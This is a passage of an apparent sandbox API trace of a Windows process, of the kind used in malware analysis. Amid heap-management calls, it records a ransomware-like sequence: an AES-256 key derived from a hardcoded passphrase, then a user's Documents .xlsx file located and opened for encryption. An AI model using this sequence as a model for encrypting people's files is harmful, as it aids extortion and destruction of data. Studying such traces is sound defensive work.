lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.235] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.235] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.235] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0078.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.238] CloseHandle (hObject=0x298) returned 1 [0078.238] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.238] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.238] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c157d0, ftCreationTime.dwHighDateTime=0x1d565c1, ftLastAccessTime.dwLowDateTime=0x1a915610, ftLastAccessTime.dwHighDateTime=0x1d5e185, ftLastWriteTime.dwLowDateTime=0x1a915610, ftLastWriteTime.dwHighDateTime=0x1d5e185, nFileSizeHigh=0x0, nFileSizeLow=0x12d19, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="z6U2MzO.xlsx", cAlternateFileName="Z6U2MZ~1.XLS")) returned 0x41ac200 [0078.238] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0078.238] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.239] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0078.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.240] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.240] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.242] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca580, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.242] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0078.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.242] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca820, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.243] CryptHashData (hHash=0x41ac500, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.243] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.243] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac200) returned 1 [0078.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.243] CryptDestroyHash (hHash=0x41ac500) returned 1 [0078.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.244] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0078.245] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0078.245] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z6u2mzo.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.245] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.245] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 